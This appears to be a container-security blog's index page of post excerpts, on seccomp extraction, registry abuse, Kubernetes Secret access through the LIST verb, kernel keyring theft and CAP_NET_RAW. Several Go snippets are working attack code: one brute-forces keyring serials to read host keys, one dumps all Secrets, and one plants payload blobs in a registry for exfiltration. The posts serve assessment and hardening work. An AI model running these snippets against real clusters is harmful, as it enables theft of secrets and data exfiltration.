- seccomp-diff extracts the real seccomp filters straight from a running container
- Reverse engineering BPF taught me more about containers and syscalls than I expected
- seccomp good, seccomp at scale hard

Ever wonder if the seccomp profile Docker or Kubernetes thinks it's applying is the same one actually enforcing syscalls inside your container? Sure, we all do, right? Well, I wrote seccomp-diff, a tool that digs into a live process using ptrace, extracts the seccomp BPF bytecode, and lets you compare it with the default seccomp profile applied in the cluster or with other running containers.
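The extraction primitive itself is small enough to sketch. Here's a minimal Go example of the general approach (a sketch, not seccomp-diff's actual code): attach to the target with ptrace, then pull the raw cBPF program out with PTRACE_SECCOMP_GET_FILTER. It assumes you have ptrace rights over the pid (in practice, root/CAP_SYS_ADMIN on the host).

```go
// Minimal sketch (not seccomp-diff itself): dump the first seccomp cBPF
// filter attached to a pid. Needs ptrace rights over the target.
package main

import (
	"fmt"
	"os"
	"strconv"
	"unsafe"

	"golang.org/x/sys/unix"
)

func main() {
	pid, _ := strconv.Atoi(os.Args[1])

	// Stop the target so we can query it.
	if err := unix.PtraceAttach(pid); err != nil {
		panic(err)
	}
	defer unix.PtraceDetach(pid)
	var ws unix.WaitStatus
	unix.Wait4(pid, &ws, 0, nil)

	// With a nil buffer, PTRACE_SECCOMP_GET_FILTER returns the number of
	// cBPF instructions in filter index 0.
	n, _, errno := unix.Syscall6(unix.SYS_PTRACE,
		unix.PTRACE_SECCOMP_GET_FILTER, uintptr(pid), 0, 0, 0, 0)
	if errno != 0 {
		panic(errno)
	}

	// A second call fills the buffer with the raw instructions.
	insns := make([]unix.SockFilter, n)
	if _, _, errno := unix.Syscall6(unix.SYS_PTRACE,
		unix.PTRACE_SECCOMP_GET_FILTER, uintptr(pid), 0,
		uintptr(unsafe.Pointer(&insns[0])), 0, 0); errno != 0 {
		panic(errno)
	}

	for i, in := range insns {
		fmt.Printf("%04d: code=0x%04x jt=%02d jf=%02d k=0x%08x\n",
			i, in.Code, in.Jt, in.Jf, in.K)
	}
}
```

From there it's a disassembly problem: decoding those code/jt/jf/k tuples back into the allow/deny logic is where the real reverse engineering starts.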
Take-aways
- Container registries are simple services ripe for subtle abuse
- They are trusted endpoints, making them useful for exfil and post-exploitation
- It's easy to make a malicious file appear like a legitimate image layer

I've been beating up container environments in the context of supply chain threats for the last few months. If you're working in container or Kubernetes security, you're constantly running into the reality that many of the exploits you know about are not going to be the next major cyber event on the front page of news sites. This post walks through another attack path using container registries that, although seemingly impactful to supply chain security, will likely not be a threat at scale.
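To make the "malicious file as a legitimate layer" point concrete: the v2 distribution API stores any blob whose digest matches its content, with no notion of what the bytes actually are. A rough Go sketch of the two-step monolithic blob upload (registry.example.com/app is a placeholder of mine, and auth handling is omitted):

```go
// Sketch: push an arbitrary blob into a v2 registry so it's stored
// indistinguishably from an image layer. Placeholder registry/repo, no auth.
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
	"net/http"
	"strings"
)

func main() {
	payload := []byte("definitely not a real image layer")
	digest := fmt.Sprintf("sha256:%x", sha256.Sum256(payload))

	// Step 1: open an upload session; the registry responds 202 with a
	// Location header for the session (assumed absolute here).
	resp, err := http.Post("https://registry.example.com/v2/app/blobs/uploads/", "", nil)
	if err != nil {
		panic(err)
	}
	resp.Body.Close()
	loc := resp.Header.Get("Location")

	// Step 2: complete the upload monolithically. The registry only checks
	// that the digest matches the bytes -- the content is never inspected.
	sep := "?"
	if strings.Contains(loc, "?") {
		sep = "&"
	}
	req, _ := http.NewRequest(http.MethodPut, loc+sep+"digest="+digest,
		bytes.NewReader(payload))
	req.Header.Set("Content-Type", "application/octet-stream")
	resp, err = http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	resp.Body.Close()

	fmt.Println("blob stored as", digest, "status:", resp.Status)
}
```

Anyone with pull access can then retrieve the blob by digest, and many registries only garbage-collect unreferenced blobs when an operator explicitly runs GC, so the payload sits on a trusted endpoint in the meantime.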
UPDATE 11/28/2020: Thanks to @jaybeale and @sethsec for pointing out I was calling it "OPA Gateway" instead of OPA Gatekeeper.

UPDATE 3/20/2021: Tim Allclair and Jordan Liggitt have a proposal with a demo that shows what PSPs may look like in the future: the 3-Tier Pod Security Proposal. It talks about turning the ideas of PSPs into an admission controller that implements the "Pod Security Standards" mentioned above.

UPDATE 4/8/2021: …And now they are. PSPs have been deprecated as planned starting with 1.21. Hopefully in 1.22, a new alpha feature currently called "Pod Security Policy Replacement Policy" will land that you can use. There are no direct paths that I know of for migrating to anything besides a third-party admission controller if you're using 1.21.
I'm writing about the Kubernetes API's use of the "LIST" verb and how it controls access to Secrets in a cluster. I've seen way too many environments, tools, templates, and examples hoping that the LIST verb can provide a meaningful security control compared to the GET verb. I'll go through a simple demo below and a few one-liners that can help you audit this yourself.

Background

Kubernetes Roles are designed to give fine-grained access to various API actions within the cluster by defining "Verbs" that you're allowed to send to the API: GET, LIST, UPDATE, CREATE… and a bunch more.
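To see why LIST alone is enough, here's a short client-go sketch (my own illustration, not the post's demo). Assume the credentials behind the kubeconfig are bound to a Role or ClusterRole granting only the list verb on secrets; a single LIST call still returns every Secret's full contents:

```go
// Sketch: a subject with only the "list" verb on secrets still receives
// full Secret objects, data and all, in the LIST response.
package main

import (
	"context"
	"fmt"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/tools/clientcmd"
)

func main() {
	config, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	if err != nil {
		panic(err)
	}
	clientset, err := kubernetes.NewForConfig(config)
	if err != nil {
		panic(err)
	}

	// NamespaceAll assumes a cluster-wide binding; scope this to one
	// namespace if the binding is a namespaced Role.
	secrets, err := clientset.CoreV1().Secrets(metav1.NamespaceAll).
		List(context.TODO(), metav1.ListOptions{})
	if err != nil {
		panic(err)
	}
	for _, s := range secrets.Items {
		for k, v := range s.Data {
			fmt.Printf("%s/%s %s=%s\n", s.Namespace, s.Name, k, v)
		}
	}
}
```

In other words, denying GET while allowing LIST doesn't hide a single byte of secret material.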
TL;DR
- The Linux kernel keyring is a known security issue for containers
- Download my tool for breaking out of a container to steal all the host keys here: keyctl-unmask
- We can use this in Kubernetes to steal all node keys as well

Have you ever wanted to steal all the secrets from a Linux host from within a container? Sure, we all have. Let's do it at scale, and I'll share a tool that speeds this up during security assessments.
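The primitive underneath is easy to sketch. Key serial numbers are just integers, so if the container can issue the keyctl syscall at all (Kubernetes historically applied no seccomp profile by default, so it can), you can brute-force serials, describe whatever exists, and try to read each key. A stripped-down Go sketch of the idea (not keyctl-unmask itself, which scans far more thoroughly):

```go
// Sketch: brute-force keyring serials and read anything the kernel allows.
// Run inside a container where keyctl isn't blocked by seccomp.
package main

import (
	"fmt"

	"golang.org/x/sys/unix"
)

func main() {
	// Serials come from a small positive int32 space; a dumb scan of the
	// low range is enough to demo the problem. Kept short here.
	for id := 1; id < 1<<20; id++ {
		desc, err := unix.KeyctlString(unix.KEYCTL_DESCRIBE, id)
		if err != nil {
			continue // no key at this serial, or we can't even see it
		}
		buf := make([]byte, 4096) // truncates very large keys; fine for a demo
		n, err := unix.KeyctlBuffer(unix.KEYCTL_READ, id, buf, 0)
		if err != nil {
			fmt.Printf("key %d (%s): present but unreadable: %v\n", id, desc, err)
			continue
		}
		if n > len(buf) {
			n = len(buf)
		}
		fmt.Printf("key %d (%s): %q\n", id, desc, buf[:n])
	}
}
```

Because the keyring is namespaced by user, not by container, the same loop run on a Kubernetes node's containers surfaces keys belonging to the host and to every other tenant sharing that node.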
Saturday, I gave my talk titled "Command and KubeCTL: Real-World Kubernetes Security for Pentesters" at Shmoocon 2020. I'm following up with this post that goes into more detail than I could cover in 50 minutes. Here's the important stuff:
- Link to Slides
- Link to Demos
- @ me on Twitter

Premise

This talk was designed to be a Kubernetes security talk for people doing offensive security or looking at Kubernetes security from the perspective of an attacker. It's demo-focused: much of the talk is one long demo showing an attack chain. I wanted something complicated yet simple to exploit, where things don't work initially and you have to figure out ways around them.
It's been on my list for at least 6 months to start contributing to krew if possible. My first plugin is called net-forward, and it's very simple but confusing if you don't see what I'm using it for.

Kubectl net-forward

From a user level, net-forward helps you create a forwarding proxy from your machine to an arbitrary IP and port that's accessible in the cluster, for example, connecting to another Pod's service located at 10.0.0.5 on port 80.
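If you want a feel for what the plugin automates, here's a rough manual equivalent using plain kubectl (the pod name, local port, and socat image choice are my own; net-forward handles the setup and teardown for you):

```
# Rough manual equivalent (hypothetical names): a socat relay pod plus a
# local port-forward to it.
kubectl run forwarder --image=alpine/socat --port=80 -- \
  tcp-listen:80,fork tcp-connect:10.0.0.5:80
kubectl port-forward pod/forwarder 8080:80
# Local 127.0.0.1:8080 now reaches 10.0.0.5:80 inside the cluster.
```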
Sometimes during a container or Kubernetes assessment, we're asked to review whether a runtime security tool a client uses is sufficient for their threat model. This often means reviewing a custom seccomp-bpf profile, AppArmor config, or third-party tool that tries to enforce the isolation between a container and the host. There are two approaches we usually take during these gigs:
- Audit the profile and identify any flaws or bypasses that could exist
- Analyze the container at runtime to validate that the policy actually enforces the expected ruleset

Basics of Container Hardening

There are ways to harden your runtime, like dropping capabilities when a container starts, but when your goal is reinforcing the isolation between the container and the host so that the container acts more like a sandbox, the main option you have is syscall filtering/monitoring: monitoring and blocking which syscalls are allowed to go from the container to the host.
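For a concrete picture of the mechanism being audited, here's a hedged Go sketch using libseccomp-golang (my library choice for illustration; it wraps the same seccomp interface runtimes use). It builds an allow-by-default filter that denies one syscall and loads it; real profiles like Docker's default invert this into a deny-by-default allowlist:

```go
// Sketch: install a seccomp-bpf filter, the same primitive a container
// runtime uses before exec'ing your process. Requires cgo + libseccomp.
package main

import (
	"fmt"

	seccomp "github.com/seccomp/libseccomp-golang"
)

func main() {
	// Allow everything by default (for brevity only -- production
	// profiles should default-deny and allowlist instead).
	filter, err := seccomp.NewFilter(seccomp.ActAllow)
	if err != nil {
		panic(err)
	}

	// Deny unshare(2), a common building block in container escapes.
	sc, err := seccomp.GetSyscallFromName("unshare")
	if err != nil {
		panic(err)
	}
	if err := filter.AddRule(sc, seccomp.ActErrno); err != nil {
		panic(err)
	}

	// Compile to cBPF and load into the kernel; the filter applies to this
	// process and everything it spawns, and can't be removed afterwards.
	if err := filter.Load(); err != nil {
		panic(err)
	}
	fmt.Println("filter loaded: unshare() now fails with an errno")
}
```

Both assessment approaches map onto this: auditing means reading the ruleset for gaps (forgotten syscalls, overly broad argument matches), and runtime analysis means confirming the loaded filter actually matches the profile the client thinks is applied.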
By default, Docker allows all of its containers to run with the CAP_NET_RAW capability, I believe to easily support ICMP health checks when needed. Supporting ping makes sense, but this post will go through why CAP_NET_RAW is an unnecessary risk and how you can still send pings without it.

What does CAP_NET_RAW do?

CAP_NET_RAW controls a process's ability to craft whatever raw packets it wants: TCP, UDP, ARP, ICMP, etc. For example, you may have noticed that running nmap --privileged as a normal user fails, because nmap assumes it can open raw sockets and can't.
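The replacement for raw-socket ping is the unprivileged ICMP datagram socket (SOCK_DGRAM with IPPROTO_ICMP), which the kernel gates with the net.ipv4.ping_group_range sysctl instead of a capability. A minimal Go sketch, assuming that sysctl includes your GID (1.1.1.1 is just an example target):

```go
// Sketch: ICMP echo without CAP_NET_RAW, via a SOCK_DGRAM/IPPROTO_ICMP
// socket. Requires net.ipv4.ping_group_range to include your GID.
package main

import (
	"fmt"
	"net"
	"os"
	"time"

	"golang.org/x/net/icmp"
	"golang.org/x/net/ipv4"
)

func main() {
	// "udp4" asks for the unprivileged ICMP datagram socket, not a raw one.
	c, err := icmp.ListenPacket("udp4", "0.0.0.0")
	if err != nil {
		panic(err) // usually means ping_group_range doesn't cover this GID
	}
	defer c.Close()

	echo := icmp.Message{
		Type: ipv4.ICMPTypeEcho, Code: 0,
		Body: &icmp.Echo{ID: os.Getpid() & 0xffff, Seq: 1, Data: []byte("hi")},
	}
	wb, err := echo.Marshal(nil)
	if err != nil {
		panic(err)
	}
	if _, err := c.WriteTo(wb, &net.UDPAddr{IP: net.ParseIP("1.1.1.1")}); err != nil {
		panic(err)
	}

	rb := make([]byte, 1500)
	c.SetReadDeadline(time.Now().Add(3 * time.Second))
	n, peer, err := c.ReadFrom(rb)
	if err != nil {
		panic(err)
	}
	reply, err := icmp.ParseMessage(1, rb[:n]) // 1 = ICMPv4 protocol number
	if err != nil {
		panic(err)
	}
	fmt.Printf("%v from %v\n", reply.Type, peer)
}
```

This is the same mechanism modern ping binaries use, which is why a container can drop CAP_NET_RAW entirely and still pass ICMP health checks.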
After 8 years of Security B-Sides Rochester, it's time for me to turn it over to new leadership that wants to keep the conference going. It's exciting that people still want to. My role recently has been the person who invested the most time running around to organize the conference, but that's not to say I "run" it. The conference is truly run by volunteers, and one of my jobs was to try to maintain some consistency while letting people do what they want.